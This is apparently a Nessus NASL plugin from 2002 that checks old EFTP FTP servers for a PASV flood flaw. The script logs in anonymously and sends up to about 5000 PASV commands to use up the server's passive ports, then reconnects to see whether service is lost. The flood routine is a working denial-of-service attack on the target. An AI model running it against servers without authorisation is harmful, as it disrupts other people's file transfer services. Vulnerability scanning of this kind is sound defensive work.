EFTP PASV denial of service



Old versions of EFTP are vulnerable to a "PASV flood": every PASV command leaves a listening data socket open, so a client issuing enough of them exhausts the server's passive ports. I have not really tested this script, as I do not have an old EFTP installation to try it against...
# This script was written by Michel Arboi <arboi_at_bigfoot.com>
#
# GPL
#

if (description)
{
 #script_id(11083);
 script_version ("$Revision$");

 # Plugin name (English / French).
 script_name(english: "EFTP PASV DoS",
             francais: "Déni de service EFTP par PASV");

 # Report text shown when the check fires.
 desc_en = "
The FTP server doesn't close the sockets that are allocated
with the PASV command. When too many ports are open, nobody
will be able to use passive mode anymore to transfer data.

An attacker may use this flaw to prevent you from 
publishing anything with FTP.

Solution : Contact your vendor for a fix.

Risk factor : Medium";

 desc_fr = "
Le serveur FTP distant ne ferme pas les sockets ouvertes
par la commande PASV. Quand trop de ports sont occupés, 
plus personne ne peut utiliser le mode passif pour transférer
des données.

Un pirate peut utiliser ce problème pour vous empêcher
de publier quoi que ce soit par ftp.

Solution: Contactez le vendeur pour obtenir un correctif

Facteur de risque : Moyen";

 script_description(english: desc_en, francais: desc_fr);

 # One-line summary of what the check actually does to the target.
 script_summary(english: "Saturate the remote FTP server by running many PASV commands",
                francais: "Sature le serveur FTP distant en lancant beaucoup de commandes PASV");

 # This is a real resource-exhaustion attempt against the target, hence
 # ACT_DENIAL; the check body also bails out when safe checks are enabled.
 script_category(ACT_DENIAL);

 script_copyright(english: "This script is Copyright (C) 2002 Michel Arboi",
                  francais: "Ce script est Copyright (C) 2002 Michel Arboi");
 script_family(english: "FTP", francais: "FTP");

 # find_service.nes locates the FTP port (Services/ftp); ftp_anonymous.nasl
 # presumably fills in the ftp/login and ftp/password KB keys read below.
 script_dependencie("find_service.nes", "ftp_anonymous.nasl");
 script_require_ports("Services/ftp", 21);
 # Skip hosts whose "FTP" service was flagged as not really being FTP.
 script_exclude_keys("ftp/false_ftp");
 exit(0);
}

# The script code starts here

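# Send one PASV command on an FTP control connection and check the reply.
#
# socket: an open FTP control socket.
#
# Returns 0 when the server answers with a 2xx reply line (PASV accepted),
# and 1 for any other reply or when nothing is received within the recv
# timeout (PASV refused or the server is no longer answering).
function pasv_ko(socket)
{
 send(socket: socket, data: string("PASV\r\n"));
 # Fix: the reply was previously read from the global 'soc' rather than
 # from the 'socket' argument. That only worked because every caller
 # happens to pass the same global; read from the socket we wrote to.
 r = recv(socket: socket, length: 1024);
 # Only the first line is inspected; a 2xx code means PASV succeeded.
 if (ereg(string: r, pattern: "^2[0-9][0-9] ")) return(0);
 return(1);
}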

# Close an FTP control connection cleanly: send QUIT, then close the
# socket. The server's reply to QUIT is not read.
#
# socket: the open FTP control socket to shut down.
function ftp_quit(socket)
{
  quit_cmd = string("QUIT\r\n");
  send(socket: socket, data: quit_cmd);
  close(socket);
}


# This check really tries to exhaust the server's passive ports, so it
# never runs in safe-checks mode.
if (safe_checks()) exit(0);

# Credentials: whatever the KB holds, falling back to anonymous FTP.
# NOTE(review): "nessus_at_nessus.com" looks like an archive-mangled e-mail
# address (the author's address on line 7 is mangled the same way); anonymous
# FTP conventionally expects an e-mail address as the password.
login = get_kb_item("ftp/login");
pass  = get_kb_item("ftp/password");
if (! login) login = "ftp";
if (! pass)  pass  = "nessus_at_nessus.com";

# FTP port from the KB, default 21; skip closed ports.
port = get_kb_item("Services/ftp");
if (! port) port = 21;
if (! get_port_state(port)) exit(0);

soc = open_sock_tcp(port);
if (! soc) exit(0);

# The login result is deliberately ignored: EFTP accepts PASV even on an
# unauthenticated control connection, so the flood can proceed either way.
r = ftp_log_in(socket: soc, user: login, pass: pass);

# If the very first PASV is refused there is nothing to exhaust; leave quietly.
if (pasv_ko(socket: soc))
{
 ftp_quit(socket: soc);
 exit(0);
}

# Flood the server with PASV commands. Around 5000 is reported to be enough
# to exhaust EFTP, whereas a sane server that closes its unused data
# sockets survives far more than 65535 of them. Stop at the first refusal.
n = 1024;
while (n <= 5000)
{
  if (pasv_ko(socket: soc))
  {
    display(string("Stopped at I=", n, "\n"));
    n = 99999;   # force the loop to end (no 'break' used here)
  }
  n = n + 1;
}

ftp_quit(socket: soc);

# Verify the damage on a fresh control connection.
soc = open_sock_tcp(port);
if (! soc)
{
  # The service itself went away: report the DoS.
  security_hole(port);
  exit(0);
}

# Still listening, but can it still hand out a passive port?
if (pasv_ko(socket: soc)) security_hole(port);

ftp_quit(socket: soc);
  

